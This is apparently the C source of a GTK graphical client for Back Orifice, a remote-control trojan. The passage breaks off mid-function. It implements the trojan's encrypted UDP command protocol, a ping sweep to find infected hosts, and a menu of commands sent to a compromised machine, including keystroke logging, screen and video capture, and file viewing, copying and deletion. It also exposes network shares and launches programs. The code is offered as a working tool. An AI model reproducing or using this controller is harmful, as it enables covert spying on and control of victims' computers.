/* boclient.c - Console client for Back Orifice */

/* gtk version by kossico, august 10/11 1998
 * by the phut klan, for the cult of the dead cow 
 * this code is copyright (c) KOSSICO, 1998 under the gnu gpl
 * please see file "COPYING" for complete info
 * kossico@yahoo.com
 */

#include "config.h"
#include "bounix.h"
#include "guicommands.h"

#include "logo.xpm"

#include <gtk/gtk.h>
#define GTK_VERSION	"0.02"

void clear_gtk(void);
void send_gtk(void);
void copy_gtk(void);
void ping_gtk(void);
void killpingwin(void);
void send_ping(void);
void find_file(void);
void change_style(void);
void file_ok_sel(GtkWidget *widget, gpointer *data);
void file_can_sel(GtkWidget *widget, gpointer *data);
void selection_made(GtkWidget *clist, gint row, gint column,
		    GdkEventButton *event, gpointer data);

/* GLOBALS */

unsigned long g_packet;
static long holdrand = 1L;
char g_password[ARGSIZE];
char g_lastdata[BUFFSIZE];
unsigned long g_lastpongip;
int g_lastpongport;
unsigned long host;
int udpsock;
char cwd[MAX_PATH];
int port = PORT;
char *command;
char *arg1;
char *arg2;
char tempular[BUFSIZ];

/* GTK GLOBALS */
GtkWidget *text_info;
GtkWidget *box1_entry, *box2_entry, *box1_label, *box2_label;
GtkWidget *command_list;
GtkWidget *host_entry, *port_entry, *pass_entry, *hostlist_entry;
GtkWidget *ping_window;
GtkWidget *filebox;


/*                    CRYPTING FUNCTIONS 
 *                    (ISS x-force has xor teknique 
 */

/* for gtk */
void delete_event(GtkWidget *widget, GdkEvent *event, gpointer *data)
{
  gtk_main_quit();
}

void  msrand (unsigned int seed )
{
  holdrand = (long)seed;
}

int mrand ( void)
{ 
  return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff);
}


unsigned int getkey()
{
  int x, y;
  unsigned int z;
  
  y = strlen(g_password);
  if (!y)
    return 31337;
  else {
    z = 0;
    for (x = 0; x < y; x++)
      z+= g_password[x];
    
    for (x = 0; x < y; x++)
      {
	if (x%2)
	  z-= g_password[x] * (y-x+1);
	else 
	  z+= g_password[x] * (y-x+1);
	z = z%RAND_MAX;
      }
    z = (z * y)%RAND_MAX;
    return z;
  }
}

void BOcrypt(unsigned char *buff, int len)
{
  int y;
  
  if (!len)
    return;
  
  msrand(getkey());
  for (y = 0; y < len; y++)
    buff[y] = buff[y] ^ (mrand()%256);
}

/*
 *                       I/O socket functions  
 */

int getpong(int sock)           /* loops through with select, returns 0 on correct ping response */
{                               /* and 1 on a timeout or select error. */
  struct sockaddr_in host;
  char buff[BUFFSIZE];
  int hostsize, x, sel;
  unsigned long *pdw;
  unsigned char *ptr;
  unsigned long packetsize;
  unsigned char type;
  fd_set fds;
  struct timeval tv;

  FD_ZERO(&fds);
  FD_SET(sock, &fds);
  tv.tv_sec = 0;
  tv.tv_usec = 0;
  hostsize = sizeof(host);
  
  while ( (sel = select(sock+1, &fds, NULL, NULL, &tv)) > 0)
    {
      tv.tv_sec=0;
      tv.tv_usec=0;

      if ( (x = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&host, &hostsize)) <= 0 ) {
	return(1);
      }

      BOcrypt(buff, x);
      
      if ( strncmp(buff, MAGICSTRING, MAGICSTRINGLEN) != 0) 
	{
	  sprintf(tempular, "------- Garbage packet recieved from %s port %d -------\n",
		 inet_ntoa(host.sin_addr),
		 (int)ntohs(host.sin_port) );
	  gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
	  continue;
	}
      pdw = (unsigned long *)buff;
      pdw+=2;
      packetsize = __EL_LONG(*pdw);
      pdw+=2;
      ptr = (unsigned char *)pdw;
      type = *ptr++;
      
      if (!(type & PARTIAL_PACKET) && !(type & CONTINUED_PACKET ) && 
	  (type == TYPE_PING))
	{
	  sprintf(tempular, "------- Pong received from %s port %d -------\n", 
		 inet_ntoa(host.sin_addr),
		 (int)ntohs(host.sin_port) );
	  gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
	  sprintf(tempular, "%s\n", ptr);
	  gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
	  sprintf(tempular, "------- End of data -------\n");
	  gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
	  g_lastpongip = host.sin_addr.s_addr;
	  g_lastpongport = (int)ntohs(host.sin_port);
	  return(0);
	} else {
	  sprintf(tempular, "------- Non pong response from %s port %d -------\n", 
		 inet_ntoa(host.sin_addr),
	     (int)ntohs(host.sin_port) );
	  gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
	  sprintf(tempular, "%s\n", ptr);
	  gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
	  sprintf(tempular, "------- End of data -------\n");
	  gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
	  continue;
	}
    }
  if (sel < 0)
    perror("select");
  
  return(1);
}


int getinput(int sock)
{
  struct sockaddr_in host;
  char buff[BUFFSIZE];
  int hostsize, x, sel;
  unsigned long *pdw;
  unsigned char *ptr;
  unsigned long packetsize;
  unsigned long oldestpack, lastpacket, packetid;
  unsigned char type;
  struct timeval tv;
  fd_set fds;

  FD_ZERO(&fds);
  FD_SET(sock, &fds);
  tv.tv_sec = 10;
  tv.tv_usec = 0;
  hostsize = sizeof(host);
  
  while( (sel = select(sock+1, &fds, NULL, NULL, &tv)) > 0 )
    {
      tv.tv_sec = 10;        /* check, does select modify tv? */
      tv.tv_usec = 0;

      if ( (x = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&host,
			 &hostsize)) <= 0)
	continue;           /* this still shouldnt happen */
      
      BOcrypt(buff, x);
      if ( strncmp(buff, MAGICSTRING, MAGICSTRINGLEN) != 0) 
	continue;                   /* this packet isnt for us, pass off */
      
      pdw = (unsigned long *)buff;    /* parse out the packet */ 
      pdw+=2;
      packetsize = *pdw++;
      packetsize = __EL_LONG(packetsize);
      packetid = *pdw++;
      packetid = __EL_LONG(packetid);
      ptr = (unsigned char *)pdw;
      type = *ptr++;
       
      /* this is a singular packet */
      if (!(type & PARTIAL_PACKET) && !(type & CONTINUED_PACKET ) )
	{
	  sprintf(tempular, "------- Packet received from %s port %d -------\n",
		 inet_ntoa(host.sin_addr),
		 (int)ntohs(host.sin_port) );
	  gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
	  sprintf(tempular, "%s\n", ptr);
	  gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
	  sprintf(tempular, "------- End of data -------\n");
	  gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
	  return 0;                                         /* success */
	}
      
      /* first packet in a set of packets */
      if (!(type & CONTINUED_PACKET))
	{
	  oldestpack = packetid;
	  sprintf(tempular, "------- Packet received from %s port %d -------\n",
		 inet_ntoa(host.sin_addr),
		 (int)ntohs(host.sin_port) );
	  gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
	}

       if(type & CONTINUED_PACKET)             /* if we're here, i believe this will always be true */
	 {
	                                       /* if packetid = lastpacket+1 (normal), this doesnt run */

	   /* This code is B00l Shit. It's borken big time.
	   for(p=lastpacket; packetid > lastpacket+1; p++)
	     printf("Packet #%d in this collection is MIA\n", (int)(p-oldestpack));
	   */
	   lastpacket = packetid;
	 }

       sprintf(tempular, "%s\n", ptr);
       gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
       
       /* last packet in a set of packets */
       if (!(type & PARTIAL_PACKET))
	 {
	   sprintf(tempular, "------- End of data -------\n");
	   gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
	   return 0;                                         /* success */
	 }
    }
  
                                                             /* determine why we broke out of the loop */
  if (sel == 0) 
  {
    sprintf(tempular, "Timeout on wait, host may not be reachable, or no server installed\n");
    gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
  }
  else if (sel < 0)
    perror("select");
  
  return(1);                                                 /* error */
}


int sendping(unsigned long dest, int port, int sock)
{
  unsigned char *ptr;
  unsigned long *pdw;
  unsigned long size;
  struct sockaddr_in host;
  char buff[BUFFSIZE];
  int i;
  fd_set fdset;
  struct timeval tv;

  size = MAGICSTRINGLEN + (sizeof(unsigned long)*2) + 2;
  strcpy(buff, MAGICSTRING);
  pdw = (unsigned long *)(buff + MAGICSTRINGLEN);
  *pdw++ = __EL_LONG(size);
  *pdw++ = __EL_LONG((unsigned long)-1);
  ptr = (unsigned char *)pdw;
  *ptr++ = TYPE_PING;
  *ptr = 0;
  
  BOcrypt(buff, (int)size);
  
  host.sin_family = AF_INET;
  host.sin_port = htons((u_short)port);
  host.sin_addr.s_addr = dest;
  
  FD_ZERO(&fdset);
  FD_SET(sock, &fdset);
  tv.tv_sec = 10;
  tv.tv_usec = 0;

  i = select(sock+1, NULL, &fdset, NULL, &tv);
  if (i == 0)
    {
      sprintf(tempular, " Timeout waiting to send to socket\n");
      gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
      return(1);
    } else if (i < 0) {
      perror("select: ");
      return(1);
    }

  if ( (sendto(sock, buff, size, 0, (struct sockaddr *)&host, sizeof(host))) != size )
    {
      perror("sendto: ");
      return(1);
    }

  return 0;
}



int sendpacket(unsigned char type, const char *str1, const char *str2, unsigned long dest, int port, int sock)
{
  unsigned char *ptr;
  unsigned long *pdw;
  unsigned long size;
  struct sockaddr_in host;
  char buff[BUFFSIZE];
  
  if (dest == 0)
    {
      sprintf(tempular, "Enter a target host in the host text box\n");
      gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
      return 1;
    }
  /*               4    4   1    ?        ?      1 
   * -----------------------------------------------
   * |MAGICSTRING|size|pakt|t|arg1... |arg2... |crc|
   * |           |    |num | |        |        |   |
   * -----------------------------------------------
   */
  size = MAGICSTRINGLEN + (sizeof(long)*2) + 3 + strlen(str1) + strlen(str2);
  strcpy(buff, MAGICSTRING);
  pdw = (unsigned long *)(buff + MAGICSTRINGLEN);
  *pdw++ = __EL_LONG(size);
  *pdw++ = __EL_LONG(g_packet);
  g_packet++;
  ptr = (unsigned char *)pdw;
  *ptr++ = type;
  strcpy(ptr, str1);
  ptr += strlen(str1) + 1;
  strcpy(ptr, str2);
  
  BOcrypt(buff, (int)size);
 
  host.sin_family = AF_INET;
  host.sin_port = htons((u_short)port);
  host.sin_addr.s_addr = dest;

  if ( (sendto(sock, buff, size, 0, (struct sockaddr *)&host, sizeof(host))) != size)
     {
       perror("sendto: ");
       return(1);
     }
  return 0;
}


/************************** MISC FUNCTIONS **************************/

void fixfilename(char *buff, const char *cwd, const char *path)
{
  if (path[0] == '\\')
    {
      strncpy(buff, cwd, 2);
      strncpy(buff+3, path, strlen(path)+1);
    } else if (strncmp(path+1, ":\\", 2) == 0){
      strcpy(buff, path);
    } else {
      sprintf(buff, "%s%s", cwd, path);
    }
}

char *quotedstring(char *dest, char *src)
{
  char *d, *s, c;
  int quote, escape;

  d=dest;
  s=src;
  quote=0;
  escape=0;
  do {
    c=*s++;
    if(quote==0) {
      if(c==' ') {
	*d++='\0';
	break;
      }
      else if(c=='"') quote=1;
      else *d++=c;
    }
    else {
      if(escape==0) {
	if(c=='"') quote=0;
	else if(c=='\\') escape=1;
	else *d++=c;
      }
      else {
	*d++=c;
	escape=0;
      }
    }
  } while(c!='\0');
  
  return s; 
}

/**************************** MAIN ***************************/

int main(int argc, char **argv)
{
  struct sockaddr_in sockaddr;
  int clientport = 0;
  struct linger linger;
  char title[50];
  int indx;

  /* gtk widgets, etc.. */ 
  GtkWidget *window;
  GtkWidget *mainbox;
  GtkWidget *hbox1, *hbox2, *hbox3, *hbox4, *sidebox1, *sidebox2, *coolbox, *picbox, *coolbox2;
  GtkWidget *send_button, *exit_button, *clear_button, *copy_button, *ping_button;
  GtkWidget *host_label, *silly_label, *command_label, *pass_label;
  GtkWidget *log_entry;
  GtkWidget *checkbox;
  GtkWidget *vscrollbar;
  GtkWidget *logopic;
  GdkPixmap *pixmap;
  GdkBitmap *mask;
  GdkColor c;

  gtk_init(&argc,&argv);

  change_style();

  sprintf(title, "Back Orifice gtk client version %s\n", GTK_VERSION);

  window = gtk_window_new(GTK_WINDOW_TOPLEVEL);
  gtk_window_set_title(GTK_WINDOW(window), title);
  gtk_container_border_width(GTK_CONTAINER(window), 5);

  gtk_signal_connect(GTK_OBJECT(window), "delete_event",
		     GTK_SIGNAL_FUNC(delete_event), NULL);

  mainbox = gtk_vbox_new(FALSE, 0);
  gtk_container_add(GTK_CONTAINER(window), mainbox);
 
  hbox1 = gtk_hbox_new(FALSE, 0);
  hbox2 = gtk_hbox_new(FALSE, 0);
  hbox3 = gtk_hbox_new(FALSE, 0);
  hbox4 = gtk_hbox_new(FALSE, 0);
  sidebox1 = gtk_vbox_new(FALSE, 0);
  sidebox2 = gtk_vbox_new(FALSE, 0);
  coolbox = gtk_vbox_new(FALSE, 0);
  coolbox2 = gtk_hbox_new(FALSE, 0);
  picbox = gtk_hbox_new(FALSE, 0);

  gtk_container_add(GTK_CONTAINER(mainbox), hbox1);
  gtk_container_add(GTK_CONTAINER(mainbox), hbox2);
  gtk_container_add(GTK_CONTAINER(mainbox), hbox3);
  gtk_container_add(GTK_CONTAINER(mainbox), hbox4);

  /* load up a logo! */
  gtk_widget_realize(window);
  pixmap = gdk_pixmap_create_from_xpm_d(window->window, &mask, &c, logo_xpm);
  logopic  = gtk_pixmap_new(pixmap, mask);
  gtk_widget_show(logopic);

  /* gui objects */
  host_label = gtk_label_new("Target host:");
  silly_label = gtk_label_new(":");
  command_label = gtk_label_new("Command");
  box1_label = gtk_label_new("not used");
  box2_label = gtk_label_new("not used");
  pass_label = gtk_label_new("Password:");
  host_entry = gtk_entry_new();
  port_entry = gtk_entry_new_with_max_length(6);
  box1_entry = gtk_entry_new();
  box2_entry = gtk_entry_new();
  pass_entry = gtk_entry_new();
  log_entry = gtk_entry_new();
  send_button = gtk_button_new_with_label("SEND");
  exit_button = gtk_button_new_with_label("EXIT");
  clear_button = gtk_button_new_with_label("Clear");
  copy_button = gtk_button_new_with_label("Copy");
  ping_button = gtk_button_new_with_label("Ping...");
  checkbox = gtk_check_button_new_with_label("Log to file:");
  text_info = gtk_text_new(NULL,NULL);
  command_list = gtk_clist_new(1);

  /* stuff for command_list */
  /* gtk_clist_set_policy(GTK_CLIST(command_list), GTK_POLICY_AUTOMATIC, 
GTK_POLICY_AUTOMATIC); */
  /* gtk_clist_set_border(GTK_CLIST(command_list), GTK_SHADOW_OUT); */
  for(indx=0; indx<52; indx++)
  {
    gtk_clist_append((GtkCList*)command_list, commands[indx]);
  }
  gtk_widget_set_usize(command_list, 200, 70);

  gtk_signal_connect(GTK_OBJECT(command_list), "select_row",
		     GTK_SIGNAL_FUNC(selection_made), NULL);   

  /* stuff for text_info */
  gtk_text_set_editable(GTK_TEXT(text_info), FALSE);
  vscrollbar = gtk_vscrollbar_new(GTK_TEXT(text_info)->vadj);
  gtk_box_pack_start(GTK_BOX(hbox3), text_info, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(hbox3), vscrollbar, FALSE, FALSE, 0);
  gtk_widget_show(vscrollbar);

  /* setup some entry widgets */
  gtk_entry_set_text(GTK_ENTRY(port_entry), "31337");
  gtk_entry_set_text(GTK_ENTRY(log_entry), "log");

  /* attaching 'em somewhere */
  gtk_box_pack_start(GTK_BOX(hbox1), coolbox, TRUE, TRUE, 0);

  gtk_box_pack_start(GTK_BOX(coolbox), picbox, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(coolbox), coolbox2, TRUE, TRUE, 0);

  gtk_box_pack_start(GTK_BOX(picbox), logopic, TRUE, TRUE, 0);

  gtk_box_pack_start(GTK_BOX(coolbox2), host_label, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(coolbox2), host_entry, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(coolbox2), silly_label, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(coolbox2), port_entry, TRUE, TRUE, 0);

  gtk_box_pack_start(GTK_BOX(sidebox1), command_label, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(sidebox1), command_list, TRUE, TRUE, 0);

  gtk_box_pack_start(GTK_BOX(hbox1), sidebox1, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(hbox1), sidebox2, TRUE, TRUE, 0);

  gtk_box_pack_start(GTK_BOX(sidebox2), send_button, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(sidebox2), exit_button, TRUE, TRUE, 0);

  gtk_box_pack_start(GTK_BOX(hbox2), box1_label, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(hbox2), box1_entry, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(hbox2), box2_label, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(hbox2), box2_entry, TRUE, TRUE, 0);

  gtk_box_pack_start(GTK_BOX(hbox4), clear_button, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(hbox4), copy_button, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(hbox4), ping_button, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(hbox4), pass_label, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(hbox4), pass_entry, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(hbox4), checkbox, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(hbox4), log_entry, TRUE, TRUE, 0);
  /* end of gtk objects */

  /* connect some gtk events */
  gtk_signal_connect(GTK_OBJECT(send_button), "clicked",
		     GTK_SIGNAL_FUNC(send_gtk), NULL);
  gtk_signal_connect(GTK_OBJECT(exit_button), "clicked",
		     GTK_SIGNAL_FUNC(delete_event), NULL);
  gtk_signal_connect(GTK_OBJECT(clear_button), "clicked",
	     	     GTK_SIGNAL_FUNC(clear_gtk), NULL);
  gtk_signal_connect(GTK_OBJECT(copy_button), "clicked",
		     GTK_SIGNAL_FUNC(copy_gtk), NULL);
  gtk_signal_connect(GTK_OBJECT(ping_button), "clicked",
		     GTK_SIGNAL_FUNC(ping_gtk), NULL);

  host = 0;
  g_packet = 0;
  g_password[0] = 0;
  strcpy(cwd, "c:\\");

  if ( (udpsock = socket(PF_INET, SOCK_DGRAM, 0)) < 0)
    {
      perror("socket: ");
      return(1);
    }
  
  memset(&sockaddr, 0, sizeof(sockaddr));
  sockaddr.sin_family = AF_INET;
  sockaddr.sin_port = htons((u_short)clientport);
  
  if ( (bind(udpsock, (struct sockaddr *)&sockaddr, sizeof(sockaddr))) < 0)
    {
      perror("bind: ");
      return(1);
    }
  
  linger.l_onoff = 0;          /* dont linger */
  setsockopt(udpsock, SOL_SOCKET, SO_LINGER, (void *)&linger, sizeof(linger) );

  /* more gtk propaganda */
  gtk_widget_show(host_label);
  gtk_widget_show(silly_label);
  gtk_widget_show(command_label);
  gtk_widget_show(box1_label);
  gtk_widget_show(box2_label);
  gtk_widget_show(pass_label);
  gtk_widget_show(host_entry);
  gtk_widget_show(port_entry);
  gtk_widget_show(box1_entry);
  gtk_widget_show(box2_entry);
  gtk_widget_show(pass_entry);
  gtk_widget_show(log_entry);
  gtk_widget_show(clear_button);
  gtk_widget_show(copy_button);
  gtk_widget_show(ping_button);
  gtk_widget_show(send_button);
  gtk_widget_show(exit_button);
  gtk_widget_show(checkbox);
  gtk_widget_show(text_info);
  gtk_widget_show(command_list);
  gtk_widget_show(hbox1);
  gtk_widget_show(hbox2);
  gtk_widget_show(hbox3);
  gtk_widget_show(hbox4);
  gtk_widget_show(sidebox1);
  gtk_widget_show(sidebox2);
  gtk_widget_show(coolbox);
  gtk_widget_show(coolbox2);
  gtk_widget_show(picbox);
  gtk_widget_show(mainbox);
  gtk_widget_show(window);

  gtk_main();

  return 0;
}

void clear_gtk(void)
{
  /* clear the text box */
  gint length;

  length = gtk_text_get_length(GTK_TEXT(text_info));
  gtk_text_backward_delete(GTK_TEXT(text_info), length);
}

void send_gtk(void)
{
  /* this is where we execute the command! */
  
  gchar *hostname, *portnum, *password;
  gchar *message = "choose a command\n";

  if(command==NULL) {
    gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, message, -1);
    return; }

  hostname = gtk_entry_get_text(GTK_ENTRY(host_entry));
  portnum  = gtk_entry_get_text(GTK_ENTRY(port_entry));
  executecommand("HOST", hostname, portnum);

  password = gtk_entry_get_text(GTK_ENTRY(pass_entry));
  executecommand("PASSWD", password, NULL);

  arg1 = gtk_entry_get_text(GTK_ENTRY(box1_entry));
  arg2 = gtk_entry_get_text(GTK_ENTRY(box2_entry));

  if(strcasecmp(command, "STOP") == 0)
  {
    command = "KEYLOG";
    arg1 = "STOP";
  }

  if(executecommand(command, arg1, arg2))
  {
    sprintf(tempular, "command failed\n");
    gtk_text_insert(GTK_TEXT(text_info), NULL, NULL, NULL, tempular, -1);
  }
}

void copy_gtk(void)
{
  /* implement this */
}

void ping_gtk(void)
{
  GtkWidget *main_box;
  GtkWidget *ok_button, *cancel_button, *find_button;
  GtkWidget *hostlist_label, *col_label, *pngs_label, *type_label;
  GtkWidget *sweep_radio, *single_radio;
  GtkWidget *box1, *box2, *box3, *box4, *box5;
  GtkWidget *col_entry, *pngs_entry;

  ping_window = gtk_window_new(GTK_WINDOW_TOPLEVEL);
  gtk_window_set_title(GTK_WINDOW(ping_window), "Ping list");

  main_box = gtk_hbox_new(FALSE, 0);
  gtk_container_add(GTK_CONTAINER(ping_window), main_box);

  box1 = gtk_vbox_new(FALSE, 0);
  box2 = gtk_hbox_new(FALSE, 0);
  box3 = gtk_vbox_new(FALSE, 0);
  box4 = gtk_vbox_new(FALSE, 0);
  box5 = gtk_hbox_new(FALSE, 0);

  gtk_box_pack_start(GTK_BOX(main_box), box1, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(main_box), box3, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(main_box), box4, TRUE, TRUE, 0);

  /* gui buttons */
  ok_button = gtk_button_new_with_label("Ok");
  cancel_button = gtk_button_new_with_label("Cancel");
  find_button = gtk_button_new_with_label("Find...");
  /* gui labels */
  hostlist_label = gtk_label_new("Host list");
  col_label = gtk_label_new("Col");
  pngs_label = gtk_label_new("#pngs");
  type_label = gtk_label_new("Type of ping");
  /* radio buttons */
  sweep_radio = gtk_radio_button_new_with_label(NULL, "Sweep subnet");
  single_radio = gtk_radio_button_new_with_label(
		gtk_radio_button_group(GTK_RADIO_BUTTON(sweep_radio)), "Single address");
  /* entries */
  hostlist_entry = gtk_entry_new();
  col_entry = gtk_entry_new();
  pngs_entry = gtk_entry_new();

  /* set up entries */
  gtk_entry_set_text(GTK_ENTRY(col_entry), "1");
  gtk_entry_set_text(GTK_ENTRY(pngs_entry), "1");

  /* put things in boxes */
  gtk_box_pack_start(GTK_BOX(box1), hostlist_label, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(box5), hostlist_entry, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(box1), box5, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(box1), box2, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(box2), col_label, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(box2), col_entry, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(box2), pngs_label, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(box2), pngs_entry, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(box5), find_button, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(box3), type_label, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(box3), sweep_radio, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(box3), single_radio, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(box4), ok_button, TRUE, TRUE, 0);
  gtk_box_pack_start(GTK_BOX(box4), cancel_button, TRUE, TRUE, 0);

  /* connect some buttons */
  gtk_signal_connect(GTK_OBJECT(ok_button), "clicked",
		     GTK_SIGNAL_FUNC(send_ping), NULL);
  gtk_signal_connect(GTK_OBJECT(cancel_button), "clicked",
		     GTK_SIGNAL_FUNC(killpingwin), NULL);
  gtk_signal_connect(GTK_OBJECT(find_button), "clicked",
		     GTK_SIGNAL_FUNC(find_file), NULL);

  gtk_widget_show(hostlist_entry);
  gtk_widget_show(col_entry);
  gtk_widget_show(pngs_entry);
  gtk_widget_show(sweep_radio);
  gtk_widget_show(single_radio);
  gtk_widget_show(ok_button);
  gtk_widget_show(cancel_button);
  gtk_widget_show(find_button);
  gtk_widget_show(hostlist_label);
  gtk_widget_show(col_label);
  gtk_widget_show(pngs_label);
  gtk_widget_show(type_label);
  gtk_widget_show(box1);
  gtk_widget_show(box2);
  gtk_widget_show(box3);
  gtk_widget_show(box4);
  gtk_widget_show(box5);
  gtk_widget_show(main_box);
  gtk_widget_show(ping_window);

  /* blah */
}

void selection_made(GtkWidget *clist, gint row, gint column,
		    GdkEventButton *event, gpointer data)
{
  gchar *text;

  gtk_clist_get_text(GTK_CLIST(command_list), row, column, &text);

  if(strcasecmp(text, "Add app") == 0)
  {	
	command = "APPADD";
	gtk_label_set(GTK_LABEL(box1_label), "exe name:");
	gtk_label_set(GTK_LABEL(box2_label), "input port:");
  }
  else if(strcasecmp(text, "App del") == 0)
  {
	command = "APPDEL";
	gtk_label_set(GTK_LABEL(box1_label), "app id:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Apps list") == 0)
  {
	command = "APPLIST";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Directory create") == 0)
  {
	command = "MD";
	gtk_label_set(GTK_LABEL(box1_label), "dir name:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Directory list") == 0)
  {
	command = "DIR";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Directory remove") == 0)
  {
	command = "RD";
	gtk_label_set(GTK_LABEL(box1_label), "dir name:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Export add") == 0)
  {
	command = "SHAREADD";
	gtk_label_set(GTK_LABEL(box1_label), "share name:");
	gtk_label_set(GTK_LABEL(box2_label), "path:");
  }
  else if(strcasecmp(text, "Export delete") == 0)
  {
	command = "SHAREDEL";
	gtk_label_set(GTK_LABEL(box1_label), "share name:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Exports list") == 0)
  {
	command = "SHARELIST";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "File copy") == 0)
  {
	command = "COPY";
	gtk_label_set(GTK_LABEL(box1_label), "filename:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "File delete") == 0)
  {
	command = "DEL";
	gtk_label_set(GTK_LABEL(box1_label), "filename:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "File find") == 0)
  {
	command = "FIND";
	gtk_label_set(GTK_LABEL(box1_label), "filename:");
	gtk_label_set(GTK_LABEL(box2_label), "pathname:");
  }
  else if(strcasecmp(text, "File freeze") == 0)
  {
	command = "FREEZE";
	gtk_label_set(GTK_LABEL(box1_label), "source:");
	gtk_label_set(GTK_LABEL(box2_label), "destination:");
  }
  else if(strcasecmp(text, "File melt") == 0)
  {
	command = "MELT";
	gtk_label_set(GTK_LABEL(box1_label), "source:");
	gtk_label_set(GTK_LABEL(box2_label), "destination:");
  }
  else if(strcasecmp(text, "File view") == 0)
  {
	command = "VIEW";
	gtk_label_set(GTK_LABEL(box1_label), "filename:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "HTTP Disable") == 0)
  {
	command = "HTTPOFF";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "HTTP Enable") == 0)
  {
	command = "HTTPON";
	gtk_label_set(GTK_LABEL(box1_label), "port:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Keylog begin") == 0)
  {
	command = "KEYLOG";
	gtk_label_set(GTK_LABEL(box1_label), "log filename:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Keylog end") == 0)
  {
	command = "STOP";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "MM Capture screen") == 0)
  {
	command = "CAPSCREEN";
	gtk_label_set(GTK_LABEL(box1_label), "bmp filename:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "MM Capture avi") == 0)
  {
	command = "CAPAVI";
	gtk_label_set(GTK_LABEL(box1_label), "avi filename:");
	gtk_label_set(GTK_LABEL(box2_label), "# of seconds:");
  }
  else if(strcasecmp(text, "MM Capture frame") == 0)
  {
	command = "CAPFRAME";
	gtk_label_set(GTK_LABEL(box1_label), "bmp filename:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "MM List capture devices") == 0)
  {
	command = "LISTCAPS";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
